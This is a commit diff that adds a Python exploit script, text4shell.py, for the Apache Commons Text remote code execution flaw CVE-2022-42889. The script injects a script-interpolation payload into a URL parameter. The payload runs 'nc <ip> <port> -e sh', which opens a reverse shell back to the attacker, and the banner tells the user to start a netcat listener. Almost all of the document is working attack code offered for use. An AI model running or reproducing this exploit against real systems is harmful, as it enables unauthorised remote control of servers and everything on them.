pwnb0y
diff --git a/‎requirement.txt
116 Bytes b/‎requirement.txt
116 Bytes
diff --git a/‎text4shell.py
+47 b/‎text4shell.py
+47
@@ -0,0 +1,47 @@
+#!/usr/bin/env python3
+# coding=utf-8
+# EXPLOIT AUTHOR
+# Vicky Aryan (@pwnb0y)
+# Apache Commons Text Vulnerability [CVE-2022-42889] 
+# Affects Commons Text versions 1.5 through 1.9
+# this exploit will work only if the target has netcat installed on their system.
+
+from termcolor import cprint
+import sys
+import argparse
+def banner():
+ import pyfiglet as pf
+ figlet1=pf.figlet_format("T3XT4SH3LL")
+ cprint(figlet1,'red')
+ cprint(' developed by @pwnb0y','yellow')
+ print('-'*50)
+ cprint('[•] CVE-2022-42889 - Apache Commons Text RCE Exploit', "green")
+ cprint("[•] Note: At first start a lister at your local machine to receive connection eg: nc -lvnp 4444",'blue')
+banner()
+if len(sys.argv) <= 1:
+    print('\n%s -h for help.' % (sys.argv[0]))
+    exit(0)
+parser=argparse.ArgumentParser(description="Apache Commons Text RCE Exploit")
+parser.add_argument('-u','--url',help="Enter URL with parameter like: https://example.com/page?param=",required=True)
+parser.add_argument('-i','--ip',help="Local IP address", required=True)
+parser.add_argument('-p','--port',help="Local Port default port is 4444",default=4444)
+parser.add_argument('-t','--type',help="Shell type default type is sh",default='sh')
+args=parser.parse_args()
+cmd=f'nc  {args.ip} {args.port} -e {args.type}'
+payload="${script:javascript:java.lang.Runtime.getRuntime().exec("+cmd+")}"
+url=args.url+payload
+def exploit():
+   import urllib3
+   try:
+    http = urllib3.PoolManager()
+    http.request('GET',url)
+   except TimeoutError as e:
+    print(e)
+if __name__ == "__main__":
+    try:
+        exploit()
+    except KeyboardInterrupt:
+        print("\nKeyboardInterrupt Detected.")
+        print("Exiting...")
+        exit(0)
+